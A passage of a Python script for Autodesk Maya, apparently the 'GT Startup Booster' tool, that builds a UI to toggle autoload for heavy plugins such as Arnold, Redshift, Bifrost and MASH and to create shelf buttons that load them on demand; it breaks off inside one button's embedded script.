# Bullet
cmds.separator(h=2, style='none') # Empty Space
cmds.rowColumnLayout(p=content_main, numberOfColumns=4, columnWidth=[(1, 110), (2, cell_size),(3,cell_size),(4,cell_size)], cs=[(1,10),(2,5),(3,5),(4,5)])
cmds.text('"AbcBullet.mll"', bgc=(.2,.2,.2), fn=plugin_name_font)
cmds.text('AbcBullet_autoload', label='... ', bgc=(.2,.2,.2))
cmds.text('AbcBullet_loaded', label='...', bgc=(.3,.3,.3))
cmds.text(label='Bullet', bgc=(.3,.3,.3))
cmds.text('"bullet.mll"', bgc=(.2,.2,.2), fn=plugin_name_font)
cmds.text('bullet_autoload', label='... ', bgc=(.2,.2,.2))
cmds.text('bullet_loaded', label='...', bgc=(.3,.3,.3))
cmds.text(label='Bullet', bgc=(.3,.3,.3))
# MASH
cmds.separator(h=2, style='none') # Empty Space
cmds.rowColumnLayout(p=content_main, numberOfColumns=4, columnWidth=[(1, 110), (2, cell_size),(3,cell_size),(4,cell_size)], cs=[(1,10),(2,5),(3,5),(4,5)])
cmds.text('"MASH.mll"', bgc=(.2,.2,.2), fn=plugin_name_font)
cmds.text('MASH_autoload', label='... ', bgc=(.2,.2,.2))
cmds.text('MASH_loaded', label='...', bgc=(.3,.3,.3))
cmds.text(label='MASH', bgc=(.3,.3,.3))
# xGen
cmds.separator(h=2, style='none') # Empty Space
cmds.rowColumnLayout(p=content_main, numberOfColumns=4, columnWidth=[(1, 110), (2, cell_size),(3,cell_size),(4,cell_size)], cs=[(1,10),(2,5),(3,5),(4,5)])
cmds.text('"xgenToolkit.mll"', bgc=(.2,.2,.2), fn=plugin_name_font)
cmds.text('xgenToolkit_autoload', label='... ', bgc=(.2,.2,.2))
cmds.text('xgenToolkit_loaded', label='...', bgc=(.3,.3,.3))
cmds.text(label='xGen', bgc=(.3,.3,.3))
cmds.rowColumnLayout(p=content_main, numberOfColumns=6, columnWidth=[(1, 318)], cs=[(1,10)])
cmds.separator(h=5)
cmds.separator(h=15, style='none') # Empty Space
cell_size = 103
cmds.rowColumnLayout(p=content_main, numberOfColumns=3, columnWidth=[(1, cell_size), (2, cell_size),(3,cell_size),(4,cell_size),(5,cell_size),(6,cell_size)], cs=[(1,10),(2,5),(3,5),(4,5),(5,5),(6,5)])
btns_height = 20
btns_bgc = (.2,.2,.2)
cmds.text('- Arnold -', bgc=btns_bgc)
cmds.text('- Redshift -', bgc=btns_bgc)
cmds.text('- Bifrost -', bgc=btns_bgc)
cmds.iconTextButton( style='iconAndTextHorizontal', image1='openScript.png', label=' Shelf Button',\
statusBarMessage='This button creates a shelf button for auto loading Arnold plugins.',\
olc=[1,0,0] , enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,\
command=lambda: add_button_arnold(), font='tinyBoldLabelFont')
cmds.iconTextButton( style='iconAndTextHorizontal', image1='openScript.png', label=' Shelf Button',\
statusBarMessage='This button creates a shelf button for auto loading Redshift plugins.',\
olc=[1,0,0] , enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,\
command=lambda: add_button_redshift(), font='tinyBoldLabelFont')
cmds.iconTextButton( style='iconAndTextHorizontal', image1='openScript.png', label=' Shelf Button',\
statusBarMessage='This button creates a shelf button for auto loading Bifrost plugins.',\
olc=[1,0,0] , enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,\
command=lambda: add_button_bifrost(), font='tinyBoldLabelFont')
cmds.iconTextButton( style='iconAndTextHorizontal', image1='redrawPaintEffects.png', label=' Auto Load',\
statusBarMessage='This button will toggle the auto load option for Arnold.',\
olc=[1,0,0] , enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,\
command=lambda: toggle_startup_booster_arnold(), font='tinyBoldLabelFont')
cmds.iconTextButton( style='iconAndTextHorizontal', image1='redrawPaintEffects.png', label=' Auto Load',\
statusBarMessage='This button will toggle the auto load option for Redshift.',\
olc=[1,0,0] , enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,\
command=lambda: toggle_startup_booster_redshift(), font='tinyBoldLabelFont')
cmds.iconTextButton( style='iconAndTextHorizontal', image1='redrawPaintEffects.png', label=' Auto Load',\
statusBarMessage='This button will toggle the auto load option for Bifrost.',\
olc=[1,0,0] , enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,\
command=lambda: toggle_startup_booster_bifrost(), font='tinyBoldLabelFont')
cmds.separator(h=3, style='none') # Empty Space
cmds.rowColumnLayout(p=content_main, numberOfColumns=3, columnWidth=[(1, cell_size), (2, cell_size),(3,cell_size),(4,cell_size),(5,cell_size),(6,cell_size)], cs=[(1,10),(2,5),(3,5),(4,5),(5,5),(6,5)])
cmds.text('- Bullet -', bgc=btns_bgc)
cmds.text('- MASH -', bgc=btns_bgc)
cmds.text('- xGen -', bgc=btns_bgc)
cmds.iconTextButton( style='iconAndTextHorizontal', image1='openScript.png', label=' Shelf Button',\
statusBarMessage='This button creates a shelf button for auto loading Bullet plugins.',\
olc=[1,0,0] , enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,\
command=lambda: add_button_bullet(), font='tinyBoldLabelFont')
cmds.iconTextButton( style='iconAndTextHorizontal', image1='openScript.png', label=' Shelf Button',\
statusBarMessage='This button creates a shelf button for auto loading MASH plugins.',\
olc=[1,0,0] , enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,\
command=lambda: add_button_mash(), font='tinyBoldLabelFont')
cmds.iconTextButton( style='iconAndTextHorizontal', image1='openScript.png', label=' Shelf Button',\
statusBarMessage='This button creates a shelf button for auto loading xGen plugins.',\
olc=[1,0,0] , enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,\
command=lambda: add_button_xgen(), font='tinyBoldLabelFont')
cmds.iconTextButton( style='iconAndTextHorizontal', image1='redrawPaintEffects.png', label=' Auto Load',\
statusBarMessage='This button will toggle the auto load option for Bullet.',\
olc=[1,0,0] , enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,\
command=lambda: toggle_startup_booster_bullet(), font='tinyBoldLabelFont')
cmds.iconTextButton( style='iconAndTextHorizontal', image1='redrawPaintEffects.png', label=' Auto Load',\
statusBarMessage='This button will toggle the auto load option for MASH.',\
olc=[1,0,0] , enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,\
command=lambda: toggle_startup_booster_mash(), font='tinyBoldLabelFont')
cmds.iconTextButton( style='iconAndTextHorizontal', image1='redrawPaintEffects.png', label=' Auto Load',\
statusBarMessage='This button will toggle the auto load option for xGen.',\
olc=[1,0,0] , enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,\
command=lambda: toggle_startup_booster_xgen(), font='tinyBoldLabelFont')
cmds.rowColumnLayout(p=content_main, numberOfColumns=6, columnWidth=[(1, 318)], cs=[(1,10)])
cmds.separator(h=2, style='none') # Empty Space
cmds.rowColumnLayout(p=content_main, numberOfColumns=6, columnWidth=[(1, 210)], cs=[(1,10),(2,5)])
custom_plugin_input = cmds.textField(pht=" Other Plugins (use comma for multiple)",\
enterCommand=lambda x:add_button_custom(cmds.textField(custom_plugin_input, q=True, text=True)),\
font='smallBoldLabelFont')
cmds.iconTextButton( style='iconAndTextHorizontal', image1='openScript.png', label=' Shelf Button',\
statusBarMessage='This button creates a shelf button for auto loading xGen plugins.',\
olc=[1,0,0] , enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,\
command=lambda: add_button_custom(cmds.textField(custom_plugin_input, q=True, text=True)), font='tinyBoldLabelFont')
cmds.rowColumnLayout(p=content_main, numberOfColumns=6, columnWidth=[(1, 318)], cs=[(1,10)])
cmds.separator(h=5)
cmds.separator(h=15, style='none') # Empty Space
cmds.rowColumnLayout( p=content_main, numberOfColumns=3, columnWidth=[(1, 157), (2, 157),(3,10)], cs=[(1,10),(2,5),(3,5)])
cmds.separator(h=10, p=content_main, st="none" )
cmds.button( l ="Refresh", c=lambda x:refresh_startup_booster_ui(), w=100, bgc=(.6,.6,.6))
cmds.button( l ="Optimize", c=lambda x:optimize_all_plugins(), bgc=(.6,.6,.6))
cmds.separator(h=10, st="none" )
def refresh_startup_booster_ui(plugins_to_load=None):
'''
Refresh UI to show current state of plugins
Parameters:
plugins_to_load (list): A list of plugins (strings) to load. If not provided refresh all.
'''
active_bgc = (.5,0,0)
inactive_bgc = (0,.5,0)
loaded_bgc = (0,.5,0)
not_loaded_bgc = (.2,.2,.2)
not_installed_bgc = (.2,.2,.2)
plugins = ['mtoa', 'redshift4maya', 'bifmeshio', 'bifrostGraph', 'bifrostshellnode', \
'bifrostvisplugin', 'Boss', 'mayaVnnPlugin', 'AbcBullet', 'bullet', 'MASH', 'xgenToolkit']
if plugins_to_load:
plugins = plugins_to_load
gMainProgressBar = mel.eval('$tmp = $gMainProgressBar');
cmds.progressBar( gMainProgressBar,
edit=True,
beginProgress=True,
isInterruptable=True,
status='"Loading Plug-ins...',
maxValue=len(plugins) )
for plugin in plugins:
if cmds.progressBar(gMainProgressBar, query=True, isCancelled=True ) :
break
is_plugin_installed = True
try:
if not cmds.pluginInfo(plugin, query=True, loaded=True):
cmds.loadPlugin(plugin, quiet=True)
except:
is_plugin_installed = False
if is_plugin_installed:
# Auto Load
if cmds.pluginInfo(plugin, q=True, autoload=True):
cmds.text(plugin + '_autoload', e=True, label='Active', bgc=active_bgc)
else:
cmds.text(plugin + '_autoload', e=True, label='Inactive', bgc=inactive_bgc)
# Loaded (Installed)
if cmds.pluginInfo(plugin, q=True, loaded=True):
cmds.text(plugin + '_loaded', e=True, label='Yes', bgc=loaded_bgc)
else:
cmds.text(plugin + '_loaded', e=True, label='No', bgc=not_loaded_bgc)
else:
cmds.text(plugin + '_autoload', e=True, label='...', bgc=not_installed_bgc)
cmds.text(plugin + '_loaded', e=True, label='No', bgc=not_installed_bgc)
cmds.progressBar(gMainProgressBar, edit=True, step=1)
cmds.progressBar(gMainProgressBar, edit=True, endProgress=True)
def toggle_startup_booster_arnold():
''' Toggle the auto load checkbox for the Redshift plugin '''
plugin_name = 'mtoa'
refresh_startup_booster_ui([plugin_name])
plugin_status = cmds.pluginInfo(plugin_name, q=True, autoload=True)
if plugin_status:
cmds.pluginInfo(plugin_name, e=True, autoload=False)
else:
cmds.pluginInfo(plugin_name, e=True, autoload=True)
refresh_startup_booster_ui([plugin_name])
def toggle_startup_booster_redshift():
''' Toggle the auto load checkbox for the Redshift plugin '''
plugin_name = 'redshift4maya'
refresh_startup_booster_ui([plugin_name])
plugin_status = cmds.pluginInfo(plugin_name, q=True, autoload=True)
if plugin_status:
cmds.pluginInfo(plugin_name, e=True, autoload=False)
else:
cmds.pluginInfo(plugin_name, e=True, autoload=True)
refresh_startup_booster_ui([plugin_name])
def toggle_startup_booster_bifrost():
''' Toggle the auto load checkbox for the Bifrost plugin '''
plugin_names = ['bifmeshio', 'bifrostGraph', 'bifrostshellnode', 'bifrostvisplugin', 'Boss', 'mayaVnnPlugin']
refresh_startup_booster_ui(plugin_names)
plugin_status = cmds.pluginInfo('bifrostGraph', q=True, autoload=True)
for plugin in plugin_names:
if plugin_status:
cmds.pluginInfo(plugin, e=True, autoload=False)
else:
cmds.pluginInfo(plugin, e=True, autoload=True)
refresh_startup_booster_ui(plugin_names)
def toggle_startup_booster_bullet():
''' Toggle the auto load checkbox for the Bullet plugin '''
plugin_names = ['AbcBullet', 'bullet']
refresh_startup_booster_ui(plugin_names)
plugin_status = cmds.pluginInfo('bullet', q=True, autoload=True)
for plugin in plugin_names:
if plugin_status:
cmds.pluginInfo(plugin, e=True, autoload=False)
else:
cmds.pluginInfo(plugin, e=True, autoload=True)
refresh_startup_booster_ui(plugin_names)
def toggle_startup_booster_mash():
''' Toggle the auto load checkbox for the MASH plugin '''
plugin_name = 'MASH'
refresh_startup_booster_ui([plugin_name])
plugin_status = cmds.pluginInfo(plugin_name, q=True, autoload=True)
if plugin_status:
cmds.pluginInfo(plugin_name, e=True, autoload=False)
else:
cmds.pluginInfo(plugin_name, e=True, autoload=True)
refresh_startup_booster_ui([plugin_name])
def toggle_startup_booster_xgen():
''' Toggle the auto load checkbox for the MASH plugin '''
plugin_name = 'xgenToolkit'
refresh_startup_booster_ui([plugin_name])
plugin_status = cmds.pluginInfo(plugin_name, q=True, autoload=True)
if plugin_status:
cmds.pluginInfo(plugin_name, e=True, autoload=False)
else:
cmds.pluginInfo(plugin_name, e=True, autoload=True)
refresh_startup_booster_ui([plugin_name])
def optimize_all_plugins():
''' Deactivate auto load for all heavy plugins '''
refresh_startup_booster_ui()
plugins = ['mtoa', 'redshift4maya', 'bifmeshio', 'bifrostGraph', 'bifrostshellnode', \
'bifrostvisplugin', 'Boss', 'mayaVnnPlugin', 'AbcBullet', 'bullet', 'MASH', 'xgenToolkit']
for plugin in plugins:
try:
cmds.pluginInfo(plugin, e=True, autoload=False)
except:
pass
refresh_startup_booster_ui()
message = 'All heavy plugins have been optimized to not open automatically.'
cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)
sys.stdout.write(message)
def add_button_arnold():
''' Create a button for manually loading the Arnold plugin '''
create_shelf_button("\"\"\"\n This button was generated using GT Startup Booster\n @Guilherme Trevisan - github.com/TrevisanGMW\n\n This button will try to load a plugin in case it's not already loaded.\n This is used to make Maya open faster by not auto loading heavy plugins during startup.\n \n How to use it:\n 1. Use GT Startup Booster and turn off \"Auto Load\" for the plugins you want to manually load.\n 2. Click on \"Add Shelf Button\" so it creates a shortcut for loading the plugin.\n 3. When you need the plugin, use the shelf button to load it.\n \n\"\"\"\nplugins_to_load = ['mtoa']\n\ndef gtu_load_plugins(plugin_list):\n ''' \n Attempts to load provided plug-ins, then gives the user feedback about their current state. (Feedback through inView messages and stdout.write messages)\n \n Parameters:\n plugin_list (list): A list of strings containing the name of the plug-ings yo uwant to load\n \n '''\n already_loaded = []\n not_installed = []\n now_loaded = []\n \n # Load Plug-in\n for plugin in plugin_list:\n if not cmds.pluginInfo(plugin, q=True, loaded=True):\n try:\n cmds.loadPlugin(plugin)\n if cmds.pluginInfo(plugin, q=True, loaded=True):\n now_loaded.append(plugin)\n except:\n not_installed.append(plugin)\n else:\n already_loaded.append(plugin)\n \n # Give Feedback\n if len(not_installed) > 0:\n message_feedback = ''\n for str in not_installed:\n message_feedback += str + ', '\n is_plural = 'plug-ins don\\'t'\n if len(not_installed) == 1:\n is_plural = 'plug-in doesn\\'t'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' seem to be installed.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' seem to be installed.')\n \n if len(now_loaded) > 0:\n message_feedback = ''\n for str in now_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(now_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' now loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' now loaded.')\n \n if len(already_loaded) > 0:\n message_feedback = ''\n for str in already_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(already_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' already loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' already loaded.')\n\n\n# Run Script\nif __name__ == '__main__':\n gtu_load_plugins(plugins_to_load)",
label='Arnold', tooltip='This button will try to load Arnold in case it\'s not already loaded.', image='openScript.png')
cmds.inViewMessage(amg='<span style=\"color:#FFFF00;\">Arnold</span> load button was added to your current shelf.', pos='botLeft', fade=True, alpha=.9)
def add_button_redshift():
''' Create a button for manually loading the Redshift plugin '''
create_shelf_button("\"\"\"\n This button was generated using GT Startup Booster\n @Guilherme Trevisan - github.com/TrevisanGMW\n\n This button will try to load a plugin in case it's not already loaded.\n This is used to make Maya open faster by not auto loading heavy plugins during startup.\n \n How to use it:\n 1. Use GT Startup Booster and turn off \"Auto Load\" for the plugins you want to manually load.\n 2. Click on \"Add Shelf Button\" so it creates a shortcut for loading the plugin.\n 3. When you need the plugin, use the shelf button to load it.\n \n\"\"\"\n\nplugins_to_load = ['redshift4maya']\n\ndef gtu_load_plugins(plugin_list):\n ''' \n Attempts to load provided plug-ins, then gives the user feedback about their current state. (Feedback through inView messages and stdout.write messages)\n \n Parameters:\n plugin_list (list): A list of strings containing the name of the plug-ings yo uwant to load\n \n '''\n already_loaded = []\n not_installed = []\n now_loaded = []\n \n # Load Plug-in\n for plugin in plugin_list:\n if not cmds.pluginInfo(plugin, q=True, loaded=True):\n try:\n cmds.loadPlugin(plugin)\n if cmds.pluginInfo(plugin, q=True, loaded=True):\n now_loaded.append(plugin)\n except:\n not_installed.append(plugin)\n else:\n already_loaded.append(plugin)\n \n # Give Feedback\n if len(not_installed) > 0:\n message_feedback = ''\n for str in not_installed:\n message_feedback += str + ', '\n is_plural = 'plug-ins don\\'t'\n if len(not_installed) == 1:\n is_plural = 'plug-in doesn\\'t'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' seem to be installed.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' seem to be installed.')\n \n if len(now_loaded) > 0:\n message_feedback = ''\n for str in now_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(now_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' now loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' now loaded.')\n \n if len(already_loaded) > 0:\n message_feedback = ''\n for str in already_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(already_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' already loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' already loaded.')\n\n\n# Run Script\nif __name__ == '__main__':\n gtu_load_plugins(plugins_to_load)" ,
label='RS', tooltip='This button will try to load Arnold in case it\'s not already loaded.', image='openScript.png')
cmds.inViewMessage(amg='<span style=\"color:#FFFF00;\">Redshift</span> load button was added to your current shelf.', pos='botLeft', fade=True, alpha=.9)
def add_button_bifrost():
''' Create a button for manually loading the Bifrost plugin '''
create_shelf_button("\"\"\"\n This button was generated using GT Startup Booster\n @Guilherme Trevisan - github.com/TrevisanGMW\n\n This button will try to load a plugin in case it's not already loaded.\n This is used to make Maya open faster by not auto loading heavy plugins during startup.\n \n How to use it:\n 1. Use GT Startup Booster and turn off \"Auto Load\" for the plugins you want to manually load.\n 2. Click on \"Add Shelf Button\" so it creates a shortcut for loading the plugin.\n 3. When you need the plugin, use the shelf button to load it.\n \n\"\"\"\nimport maya.cmds as cmds\nimport sys\n\nplugins_to_load = ['bifmeshio', 'bifrostGraph', 'bifrostshellnode', 'bifrostvisplugin', 'Boss', 'mayaVnnPlugin']\n\ndef gtu_load_plugins(plugin_list):\n ''' \n Attempts to load provided plug-ins, then gives the user feedback about their current state. (Feedback through inView messages and stdout.write messages)\n \n Parameters:\n plugin_list (list): A list of strings containing the name of the plug-ings yo uwant to load\n \n '''\n already_loaded = []\n not_installed = []\n now_loaded = []\n \n # Load Plug-in\n for plugin in plugin_list:\n if not cmds.pluginInfo(plugin, q=True, loaded=True):\n try:\n cmds.loadPlugin(plugin)\n if cmds.pluginInfo(plugin, q=True, loaded=True):\n now_loaded.append(plugin)\n except:\n not_installed.append(plugin)\n else:\n already_loaded.append(plugin)\n \n # Give Feedback\n if len(not_installed) > 0:\n message_feedback = ''\n for str in not_installed:\n message_feedback += str + ', '\n is_plural = 'plug-ins don\\'t'\n if len(not_installed) == 1:\n is_plural = 'plug-in doesn\\'t'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' seem to be installed.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' seem to be installed.')\n \n if len(now_loaded) > 0:\n message_feedback = ''\n for str in now_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(now_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' now loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' now loaded.')\n \n if len(already_loaded) > 0:\n message_feedback = ''\n for str in already_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(already_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' already loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' already loaded.')\n\n\n# Run Script\nif __name__ == '__main__':\n gtu_load_plugins(plugins_to_load)" ,
label='Bifrost', tooltip='This button will try to load Arnold in case it\'s not already loaded.', image='openScript.png')
cmds.inViewMessage(amg='<span style=\"color:#FFFF00;\">Bifrost</span> load button was added to your current shelf.', pos='botLeft', fade=True, alpha=.9)
def add_button_bullet():
''' Create a button for manually loading the Bullet plugin '''
create_shelf_button("\"\"\"\n This button was generated using GT Startup Booster\n @Guilherme Trevisan - github.com/TrevisanGMW\n\n This button will try to load a plugin in case it's not already loaded.\n This is used to make Maya open faster by not auto loading heavy plugins during startup.\n \n How to use it:\n 1. Use GT Startup Booster and turn off \"Auto Load\" for the plugins you want to manually load.\n 2. Click on \"Add Shelf Button\" so it creates a shortcut for loading the plugin.\n 3. When you need the plugin, use the shelf button to load it.\n \n\"\"\"\nimport maya.cmds as cmds\nimport sys\n\nplugins_to_load = ['AbcBullet', 'bullet']\n\ndef gtu_load_plugins(plugin_list):\n ''' \n Attempts to load provided plug-ins, then gives the user feedback about their current state. (Feedback through inView messages and stdout.write messages)\n \n Parameters:\n plugin_list (list): A list of strings containing the name of the plug-ings yo uwant to load\n \n '''\n already_loaded = []\n not_installed = []\n now_loaded = []\n \n # Load Plug-in\n for plugin in plugin_list:\n if not cmds.pluginInfo(plugin, q=True, loaded=True):\n try:\n cmds.loadPlugin(plugin)\n if cmds.pluginInfo(plugin, q=True, loaded=True):\n now_loaded.append(plugin)\n except:\n not_installed.append(plugin)\n else:\n already_loaded.append(plugin)\n \n # Give Feedback\n if len(not_installed) > 0:\n message_feedback = ''\n for str in not_installed:\n message_feedback += str + ', '\n is_plural = 'plug-ins don\\'t'\n if len(not_installed) == 1:\n is_plural = 'plug-in doesn\\'t'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' seem to be installed.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' seem to be installed.')\n \n if len(now_loaded) > 0:\n message_feedback = ''\n for str in now_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(now_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' now loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' now loaded.')\n \n if len(already_loaded) > 0:\n message_feedback = ''\n for str in already_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(already_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' already loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' already loaded.')\n\n\n# Run Script\nif __name__ == '__main__':\n gtu_load_plugins(plugins_to_load)",
label='Bullet', tooltip='This button will try to load Arnold in case it\'s not already loaded.', image='openScript.png')
cmds.inViewMessage(amg='<span style=\"color:#FFFF00;\">Bullet</span> load button was added to your current shelf.', pos='botLeft', fade=True, alpha=.9)
def add_button_mash():
''' Create a button for manually loading the MASH plugin '''
create_shelf_button("\"\"\"\n This button was generated using GT Startup Booster\n @Guilherme Trevisan - github.com/TrevisanGMW\n\n This button will try to load a plugin in case it's not already loaded.\n This is used to make Maya open faster by not auto loading heavy plugins during startup.\n \n How to use it:\n 1. Use GT Startup Booster and turn off \"Auto Load\" for the plugins you want to manually load.\n 2. Click on \"Add Shelf Button\" so it creates a shortcut for loading the plugin.\n 3. When you need the plugin, use the shelf button to load it.\n \n\"\"\"\nimport maya.cmds as cmds\nimport sys\n\nplugins_to_load = ['MASH']\n\ndef gtu_load_plugins(plugin_list):\n ''' \n Attempts to load provided plug-ins, then gives the user feedback about their current state. (Feedback through inView messages and stdout.write messages)\n \n Parameters:\n plugin_list (list): A list of strings containing the name of the plug-ings yo uwant to load\n \n '''\n already_loaded = []\n not_installed = []\n now_loaded = []\n \n # Load Plug-in\n for plugin in plugin_list:\n if not cmds.pluginInfo(plugin, q=True, loaded=True):\n try:\n cmds.loadPlugin(plugin)\n if cmds.pluginInfo(plugin, q=True, loaded=True):\n now_loaded.append(plugin)\n except:\n not_installed.append(plugin)\n else:\n already_loaded.append(plugin)\n \n # Give Feedback\n if len(not_installed) > 0:\n message_feedback = ''\n for str in not_installed:\n message_feedback += str + ', '\n is_plural = 'plug-ins don\\'t'\n if len(not_installed) == 1:\n is_plural = 'plug-in doesn\\'t'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' seem to be installed.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' seem to be installed.')\n \n if len(now_loaded) > 0:\n message_feedback = ''\n for str in now_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(now_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' now loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' now loaded.')\n \n if len(already_loaded) > 0:\n message_feedback = ''\n for str in already_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(already_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' already loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' already loaded.')\n\n\n# Run Script\nif __name__ == '__main__':\n gtu_load_plugins(plugins_to_load)" ,
label='MASH', tooltip='This button will try to load Arnold in case it\'s not already loaded.', image='openScript.png')
cmds.inViewMessage(amg='<span style=\"color:#FFFF00;\">MASH</span> load button was added to your current shelf.', pos='botLeft', fade=True, alpha=.9)
def add_button_xgen():
''' Create a button for manually loading the xGen plugin '''
create_shelf_button("\"\"\"\n This button was generated using GT Startup Booster\n @Guilherme Trevisan - github.com/TrevisanGMW\n\n This button will try to load a plugin in case it's not already loaded.\n This is used to make Maya open faster by not auto loading heavy plugins during startup.\n \n How to use it:\n 1. Use GT Startup Booster and turn off \"Auto Load\" for the plugins you want to manually load.\n 2. Click on \"Add Shelf Button\" so it creates a shortcut for loading the plugin.\n 3. When you need the plugin, use the shelf button to load it.\n \n\"\"\"\nimport maya.cmds as cmds\nimport sys\n\nplugins_to_load = ['xgenToolkit']\n\ndef gtu_load_plugins(plugin_list):\n ''' \n Attempts to load provided plug-ins, then gives the user feedback about their current state. (Feedback through inView messages and stdout.write messages)\n \n Parameters:\n plugin_list (list): A list of strings containing the name of the plug-ings yo uwant to load\n \n '''\n already_loaded = []\n not_installed = []\n now_loaded = []\n \n # Load Plug-in\n for plugin in plugin_list:\n if not cmds.pluginInfo(plugin, q=True, loaded=True):\n try:\n cmds.loadPlugin(plugin)\n if cmds.pluginInfo(plugin, q=True, loaded=True):\n now_loaded.append(plugin)\n except:\n not_installed.append(plugin)\n else:\n already_loaded.append(plugin)\n \n # Give Feedback\n if len(not_installed) > 0:\n message_feedback = ''\n for str in not_installed:\n message_feedback += str + ', '\n is_plural = 'plug-ins don\\'t'\n if len(not_installed) == 1:\n is_plural = 'plug-in doesn\\'t'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' seem to be installed.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' seem to be installed.')\n \n if len(now_loaded) > 0:\n message_feedback = ''\n for str in now_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins 